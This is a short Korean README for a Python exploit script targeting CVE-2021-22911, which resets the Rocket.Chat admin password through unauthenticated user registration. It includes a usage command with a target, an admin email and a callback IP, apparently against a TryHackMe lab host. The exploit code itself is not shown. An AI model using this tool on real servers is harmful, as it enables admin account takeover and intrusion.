
인증되지 않은 사용자 등록을 통해 Rocket.Chat 관리자 비밀번호 재설정을 대상으로 하는 CVE-2021-22911용 Python 익스플로잇 스크립트입니다. 구성 가능한 대상, 관리자 사용자 이름 및 콜백 IP로 악용을 자동화합니다.
이미 사용자를 등록한 경우에는 관리자 비밀번호만 재설정되며, 둘 다 재설정되지는 않습니다. 이로 인해 익스플로잇이 훨씬 더 빠르게 실행됩니다.
python3 exploit.py -u test -a [email protected] -t http://chat.rocket.thm -i 10.10.4.24 -p 80